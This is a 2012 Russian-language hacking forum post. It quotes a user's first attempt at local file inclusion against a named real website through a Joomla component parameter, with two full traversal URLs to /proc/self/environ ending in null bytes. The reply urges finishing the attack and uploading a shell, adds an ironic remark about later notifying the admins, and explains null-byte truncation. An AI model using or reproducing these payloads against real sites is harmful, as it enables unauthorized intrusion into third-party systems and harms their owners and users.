01.04.2012, 01:25
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от kise
Я сегодня первый раз lfi решил использовать в деле, поэтому много камней мне попадается.
Вот например, если запрос с %00 на конце, то подставляется .php, а если %000, то .php не подставляется, но и ошибка вылетает...
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%00
http://www.vash-polis.org/index.php?option=com_ckforms&view=ckforms&id=2&Ite mid=32&controller=../../../../../../../../../proc/self/environ%000
Вы углубляетесь в детали После успешно проведенной атаки и заливки шелла(я нисколько не сомневаюсь, чтобы потом уведомить админов уязвимого ресурса о бреши в их защите ), многие вопросы отпадут сами собой - практика лучше всего. Что касается вашего вопроса про %00 - просто примите это как данность. Нулл-байт(ядовитый нуль, 0x00) пришел из мира C/C++ и означает конец строки.
|
|
|